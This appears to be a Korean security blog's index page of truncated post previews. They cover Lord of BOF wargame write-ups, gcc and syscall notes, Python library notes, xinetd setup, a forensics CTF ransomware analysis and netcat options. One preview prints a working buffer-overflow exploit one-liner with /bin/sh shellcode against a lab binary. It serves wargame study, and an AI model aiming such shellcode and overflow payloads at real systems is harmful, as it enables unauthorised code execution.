전체 글

코드를 보면 1번 문제와 거의 비슷한데 argv의 갯수 제한이 없고 버퍼의 크기가 작다.따라서 argv를 이용해서 쉘을 따면 된다. gdb로 보면 dummy가 없고 평범하게 되있다.스택 구조를 보면 이런식으로 된다. argv[1]에는 ret를 argv[2]로 덮어줄 값을 입력하고 argv[2]에는 쉘코드를 넣어 주면 된다. 적당한 곳에 브레이크를 걸어 놓고 첫번째 인자로 nop을 24개 입력해서 ret까지 덮어 보고,두번째 인자의 주소를 알기위해 임시로 A를 30개 입력했다. ebp+12에 **argv가 있기 때문에 0xbffffc74의 값을 12바이트 보면첫 4바이트는 argv[0]의 주소, 그다음 4바이트는 argv[1]의 주소, 그다음 4바이트는 argv[2]의 주소 이런식으로 된다.argv[2]의..

lob는 시작하면 bash2로 해야 정상적으로 쉘코드를 넣을 수 있다. 설명대로 간단한 bof예제이다.256크기의 버퍼에 argv[1]을 복사한다. gdb로 보면 esp에 0x100(256)만큼 크기를 할당하고 dummy는 없다.따라서 256 + SFP + RET 이런 스택구조를 가진다. \x90을 264개 채워서 진행을 해보면 ret까지 딱 덮히는 것을 볼 수 있다. exploit code `python -c 'print "\x90" * 176 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x90" * 59 + "\x01\xfb\xff\xbf" ' ` 성공

옵션기능 -m32 32bit로 컴파일 -fstack-protector(-all)ssp 보호기법 켜기 -fno-stack-protector ssp 보호기법 끄기 -W,-Wall 모호한 코딩에 경고를 보냄 -S 어셈블리 파일 생성 -std=[c표준] 지정한 c표준으로 컴파일 -l[라이브러리] 해당 라이브러리를 링크 -shared 공유 라이브러리를 우선 링크 -static 정적 라이브러리를 우선 링크 -s 심볼 테이블 제거 -Wl,-z,relro,-z,now Full Relro 보호기법 적용 -e [name]시작 심볼을 name심볼로 사용 -M 심볼들의 정보르 자세히 출력 -fno-builtin단독으로 링크(표준lib 링크 X) -mpreferred-stack-boundary=2더미 없애기 (32bit = 2..

리눅스에서 시스템 호출로 넘기는 매개변수는 다음 레지스터에 저장한다. 매개변수 레지스터 1 EBX 2 ECX 3 EDX 4 ESI 5 EDI 커널은 시스템 호출이 반환하는 값을 EAX 레지스터에 저장한다. ex) EAX = syscall(EBX, ECX, EDX, ESI, EDI), *호출 전 EAX에는 시스템호출번호 오류가 발생하는 경우에는 음수를 반환한다. 즉 EAX 값이 음수가 된다.0이나 양수는 시스템 호출이 성공임을 뜻한다.

class telnetlib.Telnet([host[, port[, timeout]]])Telnet represents a connection to a Telnet server. The instance is initially not connected by default; the open() method must be used to establish a connection. Alternatively, the host name and optional port number can be passed to the constructor, to, in which case the connection to the server will be established before the constructor returns. T..

socket(socket_family, socket_type, protocol=0) - socket_family: AF_UNIX (file-based), AF_INET (network-oriented) - socket_type: SOCK_STREAM (tcp), SOCK_DGRAM (udp)- protocol: 보통 생략한다. 기본값은 0 bind( (host, port) ) - 주소와 포트를 바인드 listen(n) - bind된 소켓을 listen, n은 최대 연결 수 accept() - 클라이언트 요청을 수락 connect( (host, port) ) - 클라이어트측에서 사용함, host와 port에 접속 recv(size) - 소켓으로 size만큼 스트링을 받는다. send(string) - st..

remote 환경을 만들 때, xinetd를 이용하면 편하다. 우선 xinetd에 서비스를 등록시켜야한다. service test{socket_type = streamflags = REUSEwait = nouser = rootserver = /pathdisable = no} #flags = REUSE가 socket_type = stream보다 윗 라인에 있을경우 정상적으로 데몬이 돌아가지 않는 경우가 있을수도있음. 위와 같이 test라는 service를 /etc/xinetd.d/경로에 등록시키면 된다. 그리고 난 후 이 포트에 서비스를 매칭을 시켜줘야한다.echo "서비스명 포트/프로토콜" >> /etc/services service를 재시작 할 때는sudo service xinetd restart 이런..

hwp 파일을 덤프 하지 못해 엮여 있는 다른문제들을 못풀어서 아쉬웠는데, 못 푼 문제도 대회가 끝난 후 보고서 양식이 아닌 문제풀이 방식으로 다시 풀어보면서 공부했다. 10기가에 가까운 압축파일들을 풀면 vmdk파일 한개와 덤프파일을 한개 준다. 문제(10개) 문서를 암호화한 랜섬웨어 파일 (전체 경로) 암호화된 파일은 모두 몇개 ? 암호 알고리즘과 모드 파일은 어디에서 다운로드 되었나?(URL, 프로토콜) 랜섬웨어 파일을 다운로드한 다운로더 다운로더는 언제 피씨에 다운로드됨 ? 다운로더는 어디에서 다운로드 ? (URL, 프로토콜) 문서를 암호화한 키가 저장되있는 db, 테이블명 문서를 암호화한 키는 뭐 ? 박부장의 ip 우선 덤프파일이 어떤것인지 분석하기 위해 volatility 툴을 사용했다.덤프파..

1. 문자열 문자열은 문자들(텍스트)를 표현하기 위한 자료형이다. 단일 인용부호('') 혹인 이중인용부호("") 안에 묶여진 문자들의 모임. >>> print 'Hello World!' Hello World! >>> print "Hello World!" Hello World!인덱싱(indexing)으로 각각의 문자를 취할 수 있다. >>> s = "Hello World!" >>> s[-2] 'd'슬라이싱(slicing)으로 부분 문자열을 취할 수 있다. >>> s[1:3] 'el' >>> s[0:5] 'Hello'슬라이싱의 시작 위치가 생략되면 '처음부터', 마지막 위치가 생략되면 '끝까지'의 의미 >>> s = 'Hello' >>> s[1:] 'ello' >>> s[:3] 'Hel'슬라이싱은 세가지 값..

[ 반복 메타 문자 ][메타 문자][의미]*0회 이상 반복+1회 이상 반복?0회 or 1회{m}m회 반복{m, n}m회부터 n회까지 반복 [ 매칭 메타 문자 ][메타 문자][의미].줄바꿈 문자를 제외한 모든 문자와 매치됨^문자열의 시작과 매치됨$문자열의 마지막과 매치됨[ ]문자 집합 중 한 문자를 의미|또는(or)를 의미{ }정규식을 그룹으로 묶음 [ 이스케이프 기호 ][종류][설명]\\역슬래쉬 문자 자체\d모든 숫자와 매치됨 [0-9]\D숫자가 아닌 문자와 매치됨 [^0-9]\s화이트 스페이스 문자와 매치됨 [ \t\n\r\f\v]\S화이트 스페이스가 아닌 것과 매치됨 [^ \t\n\r\f\v]\w숫자 또는 문자와 매치됨 [a-zA-Z0-9_]\W숫자 또는 문자가 아닌 것과 매치됨 [^a-zA-Z0-9..

넷캣(Netcat)은 TCP나 UDP 프로토콜을 사용하는 네트워크 연결에서 데이터를읽고 쓰는 간단한 유틸리티 프로그램이다. 일반적으로는 UNIX의 cat과 비슷한사용법을 가지고 있지만 cat이 파일에 쓰거나 읽듯이 nc는 network connection에 읽거나 쓴다. 이것은 스크립트와 병용하여 network에 대한 debugging,testing tool로써 매우 편리하지만 반면 해킹에도 이용범위가 넓다. connect to somewhere: listen for inbound:nc [-options] hostname port[s] [ports] ...nc -l -p port [-options] [hostname] [port][ 옵션 ][ 설명 ]-c shell commandsas `-e'; use ..

◎ sys모듈은 파이썬 인터프리터와 관련된 정보와 기능을 제공하는 모듈이다. sys.argv 파이썬 스크립트로 넘어온 입력인자(argument)들의 리스트.- 아래 예제와 같이 0번째는 스크립트 이름이 있으며, 그 이후부터 인자들이 설정[ test_argv.py 예제코드 ]import sysprint("argv size :", len(sys.argv))for i, arg in enumerate(sys.argv): print(i, arg) [ 실행 결과 ]>test_argv.py arg1argv size : 20 C:\Python30\test_argv.py1 arg1 sys.exc_info() 현재 발생한 예외정보를 튜플로 반환 (예외가 없는 경우 None을 반환)[ 예외가 없는 경우 ]>>> import..